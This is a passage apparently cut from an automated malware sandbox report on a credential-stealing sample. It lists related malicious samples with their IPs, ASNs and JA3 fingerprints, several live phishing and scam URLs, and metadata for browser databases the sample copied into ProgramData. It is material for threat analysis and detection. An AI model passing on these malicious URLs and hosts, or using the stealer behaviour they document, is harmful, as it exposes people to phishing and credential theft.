                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 58.151.148.90
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 81.183.132.13
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 186.182.55.44
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 190.187.52.42
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.18.245.58
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 190.28.110.209
                  steamcommunity.comQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.197.127.21
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.192.247.89
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.192.247.89
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.67.133.187
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.199.218.33
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  file.exeGet hashmaliciousVidarBrowse
                  • 104.102.42.29

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUShttps://pub-c53ac24b12464864b63e147b424f6afa.r2.dev/ADAwATMwMAItOTU4MC1jMjA2LTAwAi0wMAoAEABW30hqQQA0SoDyAY.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 104.18.11.207
                  http://anged.pages.dev/Get hashmaliciousUnknownBrowse
                  • 172.66.47.93
                  https://kripkenlogiz.gitbook.io/Get hashmaliciousUnknownBrowse
                  • 104.20.39.213
                  http://dv-cv2.pages.dev/appeal_case_IDGet hashmaliciousUnknownBrowse
                  • 172.67.75.166
                  https://litnet.com/out?signature=2c1f4fb3a510da55&verify=f0d85a74515d878f9714518b56f64f83c3d478981c8004fd8a36ff05f77ed04b&litnet=domain&url=https://cloudflare-ipfs.com/ipfs/QmbbUyKXzZMtLWL65JBbfeA8HRigpuDZ9sk5XT4xvfvyVx?filename=reqistrer-serversNonniiii.html#YXN0cmlkLnd1cnN0ZXJAaWxlZGVmcmFuY2UuZnI=Get hashmaliciousHTMLPhisherBrowse
                  • 104.17.64.14
                  https://lobster-app-xvyb9.ondigitalocean.app/Get hashmaliciousTechSupportScamBrowse
                  • 104.17.25.14
                  https://profilebookdatacheck400021.com/64st47rjGet hashmaliciousUnknownBrowse
                  • 104.21.62.196
                  https://christiantensen478345.pages.dev/help/contact/267198133611621Get hashmaliciousUnknownBrowse
                  • 172.66.44.184
                  http://teleglsam.fit/Get hashmaliciousTelegram PhisherBrowse
                  • 104.16.124.96
                  https://louiss-comxinh.pages.dev/help/contact/388061959224233Get hashmaliciousUnknownBrowse
                  • 172.67.74.152
                  SURFAIRWIRELESS-IN-01USQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.145.40.124
                  jew.x86.elfGet hashmaliciousMiraiBrowse
                  • 23.145.58.16
                  4glhPVAaxw.exeGet hashmaliciousUnknownBrowse
                  • 23.145.40.122
                  AKAMAI-ASUShttps://uncovered-fragrant-climb.glitch.me/public/eleventy.js.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 23.50.131.157
                  T57QiayIem.elfGet hashmaliciousUnknownBrowse
                  • 23.48.239.165
                  M4huqujaBY.elfGet hashmaliciousUnknownBrowse
                  • 104.78.21.180
                  cVxP229sNF.elfGet hashmaliciousUnknownBrowse
                  • 96.16.0.180
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.192.247.89
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.192.247.89
                  ZVQBodhgp1.elfGet hashmaliciousMirai, MoobotBrowse
                  • 172.228.195.242
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 23.199.218.33
                  AFRARASAIRQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  a6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 185.235.137.54
                  2WG7HEj7mc.exeGet hashmaliciousLummaCBrowse
                  • 185.235.137.54
                  UninetSAdeCVMXURocnz2wNj.elfGet hashmaliciousUnknownBrowse
                  • 201.116.132.20
                  8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
                  • 189.159.186.178
                  T57QiayIem.elfGet hashmaliciousUnknownBrowse
                  • 187.231.47.123
                  M4huqujaBY.elfGet hashmaliciousUnknownBrowse
                  • 187.137.213.147
                  QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 187.143.58.5
                  M2Vf6ASl3g.elfGet hashmaliciousUnknownBrowse
                  • 201.147.90.14
                  mKBZo65Fcb.elfGet hashmaliciousMiraiBrowse
                  • 187.195.234.239
                  c0jeXEeVbR.elfGet hashmaliciousMiraiBrowse
                  • 189.237.9.221
                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                  • 189.163.126.89
                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                  • 201.115.242.127

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  a0e9f5d64349fb13191bc781f81f42e1QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  file.exeGet hashmaliciousLummaCBrowse
                  • 188.114.97.3
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  file.exeGet hashmaliciousRisePro StealerBrowse
                  • 188.114.97.3
                  ccsetup624.exeGet hashmaliciousUnknownBrowse
                  • 188.114.97.3
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  file.exeGet hashmaliciousRisePro StealerBrowse
                  • 188.114.97.3
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 188.114.97.3
                  51c64c77e60f3980eea90869b68c58a8QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                  • 65.109.242.59
                  file.exeGet hashmaliciousVidarBrowse
                  • 65.109.242.59
                  37f463bf4616ecd445d4a1937da06e19QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  ccsetup624.exeGet hashmaliciousUnknownBrowse
                  • 104.102.42.29
                  91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                  • 104.102.42.29
                  file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                  • 104.102.42.29

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\ProgramData\GIEHIDHJDBFI\mozglue.dllQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                      HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                        91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                          3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                            2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                              4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                      C:\ProgramData\GIEHIDHJDBFI\freebl3.dllQyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                        uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                          QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                              91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                  2.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                    4.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                        file.exeGet hashmaliciousVidarBrowse

                                                          Created / dropped Files

                                                          C:\ProgramData\GIEHIDHJDBFI\BFHJJJ

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\BGHJJD

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):9504
                                                          Entropy (8bit):5.512408163813622
                                                          Encrypted:false
                                                          SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                          MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                          SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                          SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                          SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                          C:\ProgramData\GIEHIDHJDBFI\EGIIIE

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\EGIIIE-shm

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.017262956703125623
                                                          Encrypted:false
                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                          Malicious:false
                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\FBKEHJ

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.5394293526345721
                                                          Encrypted:false
                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\GIIDBG

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.03859996294213402
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\GIIDBG-shm

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.017262956703125623
                                                          Encrypted:false
                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                          Malicious:false
                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\HIDAFH

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8746135976761988
                                                          Encrypted:false
                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\HIDBFC

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\JEBKEH

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.121297215059106
                                                          Encrypted:false
                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\JKECGD

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8439810553697228
                                                          Encrypted:false
                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\KJEGCF

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):155648
                                                          Entropy (8bit):0.5407252242845243
                                                          Encrypted:false
